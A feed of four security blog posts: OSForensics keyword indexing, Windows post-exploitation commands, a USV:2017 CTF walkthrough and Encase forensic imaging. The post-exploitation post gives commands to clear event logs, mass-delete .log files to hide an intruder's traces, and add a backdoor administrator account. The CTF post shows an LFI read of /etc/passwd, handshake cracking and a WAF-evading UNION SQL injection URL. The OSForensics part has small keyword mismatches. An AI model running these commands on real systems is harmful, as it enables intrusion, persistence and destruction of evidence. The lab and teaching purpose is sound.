We can delete any case or import an already created case.

For this article we will be working on the NPFJeane case, a demo case (E01 image) on which we will be doing the forensic investigation. (This will be our evidence; we can do the same with any other data or computer disk.) To add the evidence to our case, click on Add Device.

Select Image File, browse for the evidence file and click Open.

All the partitions in the acquired image will get listed. Select the partition and click OK.

The evidence will get added and the evidence name will be displayed. If required we can change the display name.

Once successfully added the evidence will get listed as shown below.

File Search

This option is used to search for any particular file name: we simply give the file name and browse for the drive, directory or other location we need to search.

There is a Preset option we can use to select a particular file category.

We can also filter/refine the file search by changing the configuration settings; to do so, click on the Config button and change the settings as required.

Click on OK, then in the File Search window enter the filename and click on Search. Depending on the data volume the search will take a little time and then display the results. In our search we have searched for the term "Sale", and this shows all the files that have the term "resume" in their name.

We can also view the searched files as thumbnails

and in Timeline view. Timeline view shows a bar graph representation of the keyword on the basis of time and keyword count.

This ends the file search.

Create Index / Indexing

Index search is a deeper and more refined search, and is also very vital for forensic investigations.

The most intuitive method of keyword searching is to provide a single keyword and search for occurrences of that keyword within our data/evidence. The best way to achieve this is to create an index of the drive/directory within which we need to perform the search. An index is simply a list of offsets of the occurrences of the required keywords. Indexing allows us to search within the contents of many files/drives/directories/image files at once.

In OSF we can either index on the predefined file types

or create a customised template.

We can select the extensions we need to search on, and skip any file or folder by specifying its name or by limiting the file size. Customise the template and click OK.

Click on Next and proceed to Step 2. Here we need to select the drive or directory we want to index, select the indexing option from the dropdown as shown below and click on OK.

The image, drive or folder selected will get listed (we can add multiple drives/directories for indexing).

Click on Next and proceed to Step 3.

Now we get a view of the drives we are indexing along with the extensions that will be indexed. If everything is as required, click "Start Indexing"; otherwise click the "Back" button to make changes.

Indexing will start; depending on the data it will take some time to complete.

Initially a pre-scan is performed, and immediately after the pre-scan, indexing starts automatically.

Once indexing is complete, we get a popup with an "indexing finished" message.

We can also check the index log for the status/result of indexing and any errors that may have occurred during indexing.

Search Index

Above we indexed the drive for keyword searching; now we will actually search for the keywords in the indexed drive/directory.

To start, click on Search Index.

We can see all the drives we have indexed in a dropdown.

We can either enter the keywords we want to search one by one in the "Enter Search Word" tab and click on Search to get the result on screen. We have searched for the keyword "Sales" inside our evidence and can see all the files containing the word Ethical.

Alternatively we can put the keywords we want to search in a text file and upload it; this option is suitable if we want to search multiple keywords at the same time.

We have created a text file named key.txt with three keywords and saved it on the desktop.

To upload this file click on "Use Word List File" and upload the file referred to above.

We can see the results for the keywords on screen, along with the total number of hits for each keyword in the indexed directory, under the History tab.

Double click on a keyword in the list and all the files containing that keyword will get listed under the File tab.

This ends indexing and search under indexing.
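The Create Index and Search Index steps above rest on a simple structure: an inverted index mapping each keyword to the files and offsets where it occurs, built once so that later searches do not rescan the evidence. The following is an added example written for this article, not OSForensics code: it builds such an index over constructed in-memory "files", honours the extension and file-size limits of the indexing template, and answers both a single keyword search and a word-list search that reports the hit count per keyword, the way the History tab does. File names and contents are constructed; offsets are character offsets into the text.

```python
"""Added example (not OSForensics code): a tiny inverted index of the kind
the Create Index / Search Index steps rely on. keyword -> [(file, offset)].
Files and contents below are constructed."""
import re

WORD_RE = re.compile(r"[A-Za-z0-9_]+")


def build_index(files, extensions=None, max_size=None):
    """files: {filename: text}. Returns (index, indexed_names) where index
    maps a lowercase keyword to a list of (filename, offset). extensions and
    max_size mimic the indexing template: files whose extension is not
    listed, or whose size exceeds max_size bytes, are skipped."""
    index, indexed = {}, []
    for name, text in files.items():
        ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
        if extensions is not None and ext not in extensions:
            continue
        if max_size is not None and len(text.encode("utf-8")) > max_size:
            continue
        indexed.append(name)
        for m in WORD_RE.finditer(text):
            index.setdefault(m.group().lower(), []).append((name, m.start()))
    return index, indexed


def search(index, keyword):
    """Single keyword search (case-insensitive); returns [(file, offset)]."""
    return index.get(keyword.lower(), [])


def search_word_list(index, words):
    """Like 'Use Word List File': per keyword, total hits and the files."""
    report = {}
    for w in words:
        hits = search(index, w)
        report[w] = {"hits": len(hits), "files": sorted({f for f, _ in hits})}
    return report


# Constructed evidence: two indexable files, one excluded by extension and
# one excluded by the size limit.
FILES = {
    "sales_q1.txt": "Sales figures for Q1. Ethical review pending. sales up 5%.",
    "resume.docx": "Resume of an ethical hacker with sales experience.",
    "notes.log": "ethical ethical ethical",   # .log not in the template
    "big.txt": "sales " * 1000,               # over the size limit
}

if __name__ == "__main__":
    index, indexed = build_index(FILES, extensions={"txt", "docx"}, max_size=1000)
    print("indexed:", indexed)
    print("sales:", search(index, "Sales"))
    print(search_word_list(index, ["sales", "ethical", "resume"]))
```

A real indexer tokenises inside document formats (Office, PDF, mailboxes) and stores the postings on disk, but the search path is the same: a keyword lookup returns file and offset pairs, which is why the "Enter Search Word" step above is instant even over a large image once indexing has finished.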

For more on OSForensics wait for the next article.

Author: Ankit Gupta, the author and co-founder of this website, an ethical hacker, forensics investigator , penetration testing researcher and telecom expert. He has found his deepest passion to be around the world of telecom, cyber security and digital forensics. Contact Here

The post Digital Forensics Investigation using OS Forensics (Part1) appeared first on Hacking Articles.


Manual Post Exploitation on Windows PC (System Command)

Sun, 28/Jan/2018 - 22:57

This article is about post exploitation on the victim's system using the Windows command line. When an attacker gains a Meterpreter session on a remote PC, he/she can enumerate a huge amount of information and make effective changes using knowledge of the Windows command line.

Requirement

Attacker: Kali Linux

Target: Windows PC

To execute this, we will first obtain a Meterpreter session on the remote PC, which you can learn from here. After gaining the session, escalate its privileges to Administrator, which you can learn from here.

Now, to access the Windows command line, type 'shell' in the Meterpreter shell.

Let’s Start!!

Obtain User Details and its Privileges

After gaining the Meterpreter shell or Windows command line, before doing any work it is important to know the current user. This command is usually used to verify that the account we were trying to access is the one we got. This can be done simply using the command whoami.

To increase our reach, we will use an option of the "whoami" command:

[/all]: To show all the details about the user.

Example: whoami /all

As seen below we have the username, SID and local group details.

We also obtain details about the privileges that are enabled or disabled for the user we are currently logged on as.

Obtain the System Info

This command helps us enumerate lots of information regarding the system, like hostname, domain, time zone and much more.

Example: systeminfo

We can filter the basic system details (Manufacturer, Build and Model) of the victim's system using findstr.

Example: systeminfo | findstr System

As shown in the screenshot below we have the Boot Time, Manufacturer, Model, Type, Directory and Language of the victim's system.

We can obtain the location (to the level of the country) of the victim's system using systeminfo.

Here we use findstr with systeminfo to filter the systeminfo results.

Example: systeminfo | findstr Time

As shown in the screenshot below we have the Time Zone (UTC+05:30), so we can say that the victim's system is in "INDIA".

Obtain Memory Details (Physical, Virtual, In Use, Free)

We can obtain the basic memory details of the victim's system using systeminfo.

Here we use findstr with systeminfo to filter the systeminfo results.

Example: systeminfo | findstr Memory

As shown in the screenshot below we have the Total Physical Memory of 3.5 GB, of which 1.6 GB is available; we also obtain the virtual memory details.

Obtain the List of System Drivers

We can display a list of all installed device drivers on the victim's system and their properties through the command driverquery.

Example: driverquery

 

Obtain the List of Kernel Drivers

We can obtain the list of kernel drivers on the victim's system using driverquery.

Here we use findstr with driverquery to filter the driverquery results.

Example: driverquery | findstr Kernel

As seen below we have obtained a list of kernel drivers, which can be used to look for exploits that directly target the victim's system.

Obtain the List of File System Drivers

We can obtain the list of file system drivers on the victim's system using driverquery.

Here we use findstr with driverquery to filter the driverquery results.

Example: driverquery | findstr “File System”

Display Info about a Particular Service

We can obtain information about a particular service using the sc command. Here we use the following option with the sc command:

[query] to query the named service.

Syntax: sc query [service name]

Example: sc query wuauserv

Obtain the list of Active Tasks

We can obtain information about running tasks using the tasklist command.

This command shows the name of each running task along with its Process ID (PID), Session Name, Session Number and Memory Usage.

Syntax: tasklist

We can filter the output of tasklist by module using the following option of the tasklist command:

[/m]: to specify the module to filter the tasklist by.

We will have to mention the module that is to be used to filter the tasklist.

Syntax: tasklist /m [Module Name]

Example:  tasklist /m ntdll.dll

Here we can see all the tasks linked with the ntdll.dll module.

Killing Tasks

We can kill tasks on the victim's system using a command called taskkill.

Taskkill requires one of two things:

  1. Process Id
  2. Task Name

Here we are going to use [/f] option in taskkill, it enables the Taskkill to forcefully kill the tasks.

Killing the Tasks using the Process ID

Syntax: taskkill /f /pid [Process id of Task]

Example: taskkill /f /pid 7236

Killing the Tasks using the Task Name

Syntax: taskkill /f /im “[Task Name]”

Example: taskkill /f /im “Taskmgr.exe”

Start or Stopping Services

We can start a service, or some backdoor, without the victim’s knowledge using the sc command.

Here we are using the following option with the sc command:

[start] to start a service.

Syntax: sc start [Service Name]

Example: sc start TeamViewer

As you can see in the below image the service has started.

We can also stop a service using the sc command. Here we are using the following option with the sc command:

[stop] to stop a service.

Syntax: sc stop [Service Name]

Example: sc stop TeamViewer

As you can see in the image below, the service has stopped.

List all the logs on the System

We can obtain a list of all the logs on a system using the wevtutil command. Here we are using the following option with the wevtutil command:

[el] to List log names.

Example: wevtutil el

Clear a specific log on the System

We can clear a specific log on a system using the wevtutil command. Here we are using the following option with the wevtutil command:

[cl] to clear a log.

Syntax: wevtutil cl [log name]

Example: wevtutil cl System

Find all the Hard Disk/Storage Partitions on a System

While penetration testing a remote PC, knowledge of all the hard disks, storage devices and partitions is essential, so that we can sweep every partition and storage device in the hope of finding data of particular importance.

This can be done using the fsutil command. Here we are using the following options with the fsutil command:

[fsinfo] to view file system info.

[drives] to list all drives.

Example: fsutil fsinfo drives

As you can see below, the victim system has 4 hard disk partitions: C, D, E and F.

Delete all logs on a System

While penetration testing a remote PC, it is essential to remove the trace of your activities, so we need to remove the evidence of our presence that can be found in log files.

Most plain-text log files have a .log extension, so we are going to sweep the system directory for files with the .log extension and delete them with the del command.

Note: Use this command with the path set to System Directory (In my case it is C:\)

Here we are using the following options with the del command:

[/a] to select files based on attributes (with no attribute list given, files are selected regardless of attributes)

[/s] to delete matching files from all subdirectories as well

[/q] to use quiet mode (it doesn’t ask whether it is OK to delete on global wildcards)

[/f] to force deletion of read-only files

Syntax: del [Directory]\*.log /a /s /q /f

Example: del \*.log /a /s /q /f

As you can see in the below screenshot the process of detecting and deleting the files with .log extension has started.

Manage Local Users

While penetration testing a remote PC, it is important to obtain the list of local users so that the attacker can gain information about the various users assigned to that particular system.

This can be done using the net command. Here we are using the following option with the net command:

[user] to display the list of local users

Example: net user

It is always advantageous to add a user to the local groups so that the attacker can perform certain tasks on that system.

This can be done using the net command. Here we are using the following syntax with the net command:

Syntax: net user [logon_name] [password] /add

Example: net user hacker pass123 /add

Many times, we come across a situation where we will have to perform certain administrative tasks, so we will add the user we created to the local Administrators group.

Here we are using the following option with the net command:

[localgroup] to select a local group

Syntax: net localgroup administrators [logon_name] /add

Example: net localgroup administrators hacker /add

In the above example, I have added a user named hacker to the local administrators group. We can verify this using the “net user” command.

Now, during the clean-up process it is important to delete the local user we created.

This can be done using the net command. Here we are using the following syntax with the net command:

Syntax: net user [logon_name] /del

Example: net user hacker /del

Here you can see that I have used the net command to add a user, make it a member of the local administrators group and then delete that user.
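From the defender’s side, the account changes above and the log clearing from the earlier wevtutil section both leave event-log traces. The following PowerShell script is an added example (not part of the original post) that pulls those traces out of the Security and System logs; the event IDs are the documented Windows ones, and the English message templates used for the detail lines are an assumption.

```powershell
# Added example (not from the original post): surface the traces left by
# "net user /add", "net localgroup administrators /add", "net user /del"
# and "wevtutil cl".
# Security 4720 = user account created, 4726 = user account deleted,
# 4732 = member added to a security-enabled local group,
# 1102 = Security log cleared; System 104 = some other log was cleared.
# Assumes an elevated prompt and that "Audit User Account Management"
# is enabled; check with: auditpol /get /category:"Account Management"
param([int]$Hours = 24)

$since = (Get-Date).AddHours(-$Hours)

# "wevtutil cl Security" cannot hide itself: the first event written to the
# freshly cleared Security log is 1102, naming the account that cleared it.
$events = @(
    Get-WinEvent -FilterHashtable @{
        LogName = 'Security'; Id = 4720, 4726, 4732, 1102; StartTime = $since
    } -ErrorAction SilentlyContinue
) + @(
    Get-WinEvent -FilterHashtable @{
        LogName = 'System'; Id = 104; StartTime = $since
    } -ErrorAction SilentlyContinue
)

$labels = @{
    4720 = 'local user created'
    4726 = 'local user deleted'
    4732 = 'member added to local group'
    1102 = 'Security log cleared'
    104  = 'event log cleared'
}

$events | Sort-Object TimeCreated | ForEach-Object {
    # Pull the "Account Name:" / "Group Name:" lines out of the message text
    # (English templates assumed) so the who/what is visible at a glance.
    $detail = ($_.Message -split "`r?`n" |
        Where-Object { $_ -match 'Account Name:|Group Name:' } |
        ForEach-Object { ($_ -replace '\s+', ' ').Trim() }) -join '; '
    [pscustomobject]@{
        Time   = $_.TimeCreated
        Id     = $_.Id
        What   = $labels[[int]$_.Id]
        Detail = $detail
    }
} | Format-Table -AutoSize -Wrap
```

Deleting *.log files with del, by contrast, produces no event unless object-access auditing has been configured for those directories, so file-integrity monitoring or forwarded logs are the only way to see that step.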

Display the List of all Scheduled Tasks

While penetration testing a remote PC, it is necessary to know the scheduled tasks in order to plan the attack accordingly and further penetrate the victim’s system. This can be done using schtasks.

We can format the schtasks output to make it more readable, i.e. in list format.

Here we are using the following options with the schtasks command:

[/query] to display all scheduled tasks

[/fo] to specify the format of the Output (In this case we use List)

[/v] to use verbose mode

Example: schtasks /query /fo LIST /v
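The LIST output above is readable but hard to filter. The following PowerShell is an added example (not part of the original post) that parses the CSV form of the same verbose query into objects and, from a reviewer’s standpoint, flags enabled tasks that run as SYSTEM or Administrators from outside the usual system directories. The function name Get-ParsedScheduledTask and the trusted-path pattern are assumptions; the column names are those schtasks itself emits.

```powershell
# Added example (not from the original post): the same inventory as
# "schtasks /query /fo LIST /v", parsed into objects so it can be filtered.
# Uses the column names schtasks emits in CSV mode: "TaskName",
# "Task To Run", "Run As User", "Scheduled Task State", "Author".
function Get-ParsedScheduledTask {
    $rows = schtasks /query /fo CSV /v | ConvertFrom-Csv
    # schtasks repeats its header line once per task folder; ConvertFrom-Csv
    # turns those repeats into rows whose TaskName is literally "TaskName".
    $rows | Where-Object { $_.TaskName -ne 'TaskName' } | ForEach-Object {
        [pscustomobject]@{
            TaskName = $_.TaskName
            RunAs    = $_.'Run As User'
            Command  = $_.'Task To Run'
            State    = $_.'Scheduled Task State'
            Author   = $_.Author
        }
    }
}

# Reviewer's view (assumed trusted-path pattern): enabled tasks running with
# SYSTEM or Administrators rights whose command lives outside the Windows or
# Program Files trees deserve a closer look. "COM handler" rows carry no path.
$trusted = '^"?(C:\\Windows|C:\\Program Files|%SystemRoot%|%windir%|%ProgramFiles%)'

Get-ParsedScheduledTask |
    Where-Object {
        $_.State -eq 'Enabled' -and
        $_.RunAs -match 'SYSTEM|Administrators' -and
        $_.Command -ne 'COM handler' -and
        $_.Command -notmatch $trusted
    } |
    Format-Table TaskName, RunAs, Command -AutoSize -Wrap
```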

Author: Pavandeep Singh is an Ethical Hacker, Web Penetration Tester, Windows Command Line Expert and Researcher at hackingarticles.in. Contact here

The post Manual Post Exploitation on Windows PC (System Command) appeared first on Hacking Articles.

Categories: Cyber India

Hack the USV: 2017 (CTF Challenge)

Fri, 26/Jan/2018 - 11:05

Hello friends! Today we are going to take another CTF challenge known as USV: 2017. The credit for making this vm machine goes to “Suceava University” and it is another capture the flag challenge in which our goal is to find 5 flags to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start from getting to know the IP of the VM (here I have it at 192.168.0.18, but you will have to find your own).

Let’s do an nmap scan for port enumeration.

nmap -A -p- 192.168.0.18

We find ports 21, 22, 80, 4369, 5222, 5269, 5280, 15020 and 33939 to be open. Port 80 is running http and port 15020 is running https.

So we first open 192.168.0.18 in our browser.

We don’t find anything on this page so we enumerate the directories for further information.

dirb http://192.168.0.18

During our directory enumeration we find a page called admin2; we open it in our browser and find it to be a login page.

We take a look at the source code and find that the password check is hidden in the page itself. The page uses JavaScript to verify the password, and the JavaScript is hex-encoded.

We first decode the hex and find that if the computed value is 1079950212331060 it lets you in, otherwise it shows a wrong-password message. The final value is calculated using the formula:

(stringconcat(password+4469)-234562221224)*1988=1079950212331060

Now when we calculate the value of the password we find it to be 77779673. When we enter it we get the 1st flag.
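Reversing that formula step by step, as an added illustration that is not part of the original writeup (stringconcat(password+4469) is the page’s notation for the password with the digits 4469 appended as a string):

```latex
\begin{aligned}
\text{stringconcat}(\text{password}+4469) &= \frac{1079950212331060}{1988} + 234562221224 \\
&= 543234513245 + 234562221224 \\
&= 777796734469 \\
\text{password} \,\Vert\, \text{``4469''} &= \text{``777796734469''} \\
\Rightarrow \quad \text{password} &= 77779673
\end{aligned}
```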

Now we open the ip 192.168.0.18 at port 15020 as it is running another apache service. When we open the ip on our browser we find that we need to install ssl certificate. We take a look at the details of the certificate for information; at the issuer section we find our 2nd flag.

We accept the certificate and open the web page.

We don’t find anything on the webpage. So we enumerate the directories on this page.

dirb http://192.168.0.18:15020

Here we find two interesting directories, blog/ and vault/. The vault/ directory contains an enormous number of directories, so we leave it for now.

We open blog/ directory and find a few blogs with few comments.


Going through the blogs, we find kevin’s blog with one comment that hints there is a flag inside his home directory.

We take a look at the source code and find a hint to open a PHP file called download.php.

When we open it we find that an image parameter is used to open a file, so this page may be vulnerable to LFI.

We cannot exploit the LFI vulnerability directly from the browser, so we send the parameter as POST data using curl.

curl -d “image=/etc/passwd” https://192.168.0.18:15020/blog/download.php -k

Now, as was written in the comment on kevin’s blog, we check for the flag in the /home/kevin/ directory and find the 3rd flag.

curl -d “image=/home/kevin/flag.txt” https://192.168.0.18:15020/blog/download.php -k

Now we go to the other directory, vault/. It contains a lot of directories, so we download it to our system to make it easier to look through them. We download the entire tree using the recursive download option of wget.

wget -r --no-check-certificate "https://192.168.0.18:15020/vault"

Now we use the find command to look for files and grep to rule out .html files. We find two files: rockyou.zip and a .cap file.

find ./ -type f | grep -v .html

We open the .cap file in Wireshark and, going through the packets, find it to be a Wi-Fi handshake capture.

We use this site here to convert the .cap file to hccapx, to make it compatible with hashcat.

Now we use hashcat to crack the handshake. We use the wordlist provided by the server, just in case it has some extra keywords.

hashcat -m 2500 -a 0 ctf.hccapx 192.168.0.18:15020/rockyou.txt

We use username admin and the password we find from hashcat that is “minion.666” to login through the admin page.

As soon as we log in, we find that this page may be vulnerable to SQL injection.

Now we use burpsuite to capture the request and use CO2 extension of burpsuite to exploit the sql injection but first we take a look at the source code.

When we look at the source code we find our 4th flag.

Now we use CO2 for SQL injection. We select database, tables, columns and dump to grab all the names of the databases, tables and columns.

It gave us the names of the database, tables and columns. Unfortunately it couldn’t dump the database for some reason, so we exploit the SQL injection manually through the browser.

We find that the server uses a firewall that blocks any SQL query. We use the normalization method to bypass this firewall. With the names of the columns and table we were able to execute our SQL injection.

https://192.168.0.18:15020/blog/admin/edit.php?id=7 /*union*/union/*all*/all/*select*/select%201,login,password,4%20from%20users%20order%20by%201%20limit%201,1

When we change the parameter of the id the output also changes, after going through different parameters we find that parameter 7 gave us our 5th and final flag.

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

The post Hack the USV: 2017 (CTF Challenge) appeared first on Hacking Articles.

Categories: Cyber India

Forensic Imaging through Encase Imager

Thu, 25/Jan/2018 - 22:14

Scenario: Mr X is suspected of selling his company’s confidential data to competitors, but without any evidence no action can be taken against him. To establish the facts and prove Mr X guilty, the company has requested forensic services and has come to know that all the relevant data is present on the desktop provided to him.

This article is about getting the forensic image of the digital evidence and restoring it to any other drive.

Since it is never advisable to work with the original evidence, because we may accidentally lose some relevant data, we will create an image of the original evidence and work on that instead. This way the original evidence stays safe, and the integrity and authenticity of the evidence can be proved through hash values.

This article is also very helpful if we need to back up the data safely.

To image the desktop we will use Encase Imager. First download the Encase Imager from here

Open Encase Imager and Select Add local device option.

From the menu select all the options and uncheck “only show write blocked” as shown in the image and click next.

We can see all the physical drives, logical partitions, CD-ROM, RAM and processes running on the system. We need to select what we want to image as our evidence; ideally it is good practice to select the physical drive that contains the logical partitions, as imaging the physical drive gives us the complete disk image. In certain cases we may select only a logical drive or RAM, as required.

Select / Check the number of the evidence you want to image and click on finish.

The evidence you have selected will be listed; if more than one item of evidence had been selected, we would have seen multiple items listed here.

Double-click on the evidence; we can see the contents present inside it, and if we wish we can exclude any part, file or folder from being imaged at this stage.

Click on Acquire to proceed with the imaging. Now we need to enter the case-related information, i.e. the case number, the output path and the file format in which we want to generate the image.

File format selected here is E01 as this is supported by multiple tools and is suitable for further analysis.

If we want to password protect/encrypt our image we can do this at this stage.

Note: It is ideal to store the image on any other external storage drive so that the storage space is not a constraint but for the sake of practical we are saving the image on desktop at the following path “C:\Users\…..\Desktop\Evidence Image\1.E01”.

Click ok and image acquisition will start, you can check the status of image acquisition on the same window at the lower right corner along with the time remaining (refer below image).

Once the acquisition is complete the image will get saved to the output folder (refer below image).

To prove the authenticity of the evidence we can generate the Hash value of the evidence

To generate the hash value of the image click on the evidence and select hash as shown in the image below.

Once the hashing process is complete click on the report section on the lower pane

Right Click and select Copy to copy the report and paste in a word /text document.

Save the report along with the Image (E01) files. This report contains all the relevant details along with the detailed report containing the hash values.

The Evidence acquisition is complete

Restoring the Evidence Image

We are done with imaging the disk/evidence. Now we will restore this acquired image to a drive. To start, open Encase Imager and add the evidence to it.

Browse to the image (.E01) file and add it to the case. The added evidence will be listed.

Double-click on the image, select the files to be restored and select the Restore option located under the Device menu.

When we click on Restore, connect the drive where we want to restore the image and click Next.

All the drives will be read.

All the drives will be displayed; select the drive where the image is to be restored. Use a blank drive for restoring the image, as the existing data will be wiped.

If required we can verify the Hash values and click on finish.

Type “Yes” in the text box and click on OK this will wipe the existing data on the drive and start with the image restoration.

Image Restoration will start, we can check the progress on the lower right corner of the window.

Once the restoration is complete, we can see the data in the drive we have selected.

To ensure the integrity of the data, we can see the report section on the bottom pane and check the hash values. The hash values should be same as of the image (we can check the original hash value in the image report.)

If required we can copy and save the report in any text / word file for any future reference.

Author: Ankit Gupta, the author and co-founder of this website, an ethical hacker, forensics investigator, penetration testing researcher and telecom expert. He has found his deepest passion to be around the world of telecom, cyber security and digital forensics. Contact Here

The post Forensic Imaging through Encase Imager appeared first on Hacking Articles.

Categories: Cyber India